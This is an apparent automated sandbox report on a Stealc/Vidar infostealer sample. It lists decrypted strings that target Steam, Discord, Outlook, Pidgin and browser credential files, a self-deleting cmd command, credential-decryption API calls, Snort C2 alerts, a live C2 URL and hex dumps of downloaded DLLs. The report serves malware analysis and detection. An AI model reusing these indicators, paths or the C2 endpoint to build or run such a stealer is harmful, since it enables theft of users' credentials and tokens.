Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: 00000002
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: 00000003
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: 00000004
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Pidgin
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \.purple\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: accounts.xml
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: token:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SteamPath
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \config\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ssfn*
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: config.vdf
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: loginusers.vdf
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \Steam\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: browsers
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: done
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: soft
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: https
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: POST
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: HTTP/1.1
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: hwid
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: build
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: token
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: file_name
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: file
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: message
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02759540 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_02759540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	2_2_0275BF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02756C10 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	2_2_02756C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027594A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_027594A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02765590 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	2_2_02765590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	2_2_6C2B6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C40A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6C40A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C404440 PK11_PrivDecrypt,	2_2_6C404440

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	2_2_0275B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0275DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02761B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_02761B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02762570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_02762570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0275D1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_027515C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02761650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,PR_IsNetAddrType,FindNextFileA,FindClose,	2_2_02761650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0275D540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027621F0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_027621F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49731 -> 23.88.106.134:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49731 -> 23.88.106.134:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 23.88.106.134:80 -> 192.168.2.4:49731
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49731 -> 23.88.106.134:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 23.88.106.134:80 -> 192.168.2.4:49731

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://23.88.106.134/6a9f8e2503d99c04.php
Source: Malware configuration extractor	URLs: http://23.88.106.134/6a9f8e2503d99c04.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:00 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:04 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:05 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Jun 2024 18:22:06 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 